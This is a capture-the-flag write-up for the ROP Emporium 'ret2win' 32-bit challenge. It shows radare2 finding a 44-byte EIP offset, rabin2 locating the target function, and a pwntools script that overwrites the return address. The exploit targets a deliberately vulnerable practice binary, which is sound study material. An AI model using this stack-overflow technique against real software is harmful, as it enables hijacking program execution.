Rop Emporium Ret2win 32 bit

Get Offset to EIP

ragg2 -P 100 -r
AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAh

r2 ret2win32
[0x08048430]> doo 
File dbg:///home/hacker/challenges/binexp/STACK/rop_emporium_all_challenges/Ret2win/x86/ret2win32 reopened in read-write mode
[0xeb565bd0]> dc
ERROR: ld.so: object 'libgtk3-nocsd.so.0' from LD_PRELOAD cannot be preloaded (cannot open shared object file): ignored.
ret2win by ROP Emporium
x86

For my first trick, I will attempt to fit 56 bytes of user input into 32 bytes of stack buffer!
What could possibly go wrong?
You there, may I have your input please? And don't worry about null bytes, we're using read()!

> AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAh
Thank you!
[+] SIGNAL 11 errno=0 addr=0x41415041 code=1 si_pid=1094799425 ret=0
[0x41415041]> ATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAh
|ERROR| Invalid command 'ATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAh' (0x41)
[0x41415041]> dr
eax = 0x0000000b
ebx = 0xeb520e34
ecx = 0xeb5228a0
edx = 0x00000000
esi = 0x08048660
edi = 0xeb57eb60
esp = 0xffd1d630
ebp = 0x414f4141
eip = 0x41415041
eflags = 0x00010286
oeax = 0xffffffff
[0x41415041]> wopO `dr eip`
44
[0x41415041]> 

Offset = 44

---

Ret2win Function address

rabin2 -s ret2win32
[Symbols]

nth paddr      vaddr      bind   type   size lib name
―――――――――――――――――――――――――――――――――――――――――――――――――――――
-- <snipped> --
36  0x000005ad 0x080485ad LOCAL  FUNC   127      pwnme
37  0x0000062c 0x0804862c LOCAL  FUNC   41       ret2win
38  ---------- 0x00000000 LOCAL  FILE   0        crtstuff.c
-- <snipped> --

function address = 0x0804862c

---

Exploit

#!/bin/python3
from pwn import *

ret = p32(0x0804862c)
offset = 44
payload = b'A'*offset # fill the buffer 
payload += ret # let eip point to the function


p = process("./ret2win32")
p.sendline(payload)
p.interactive()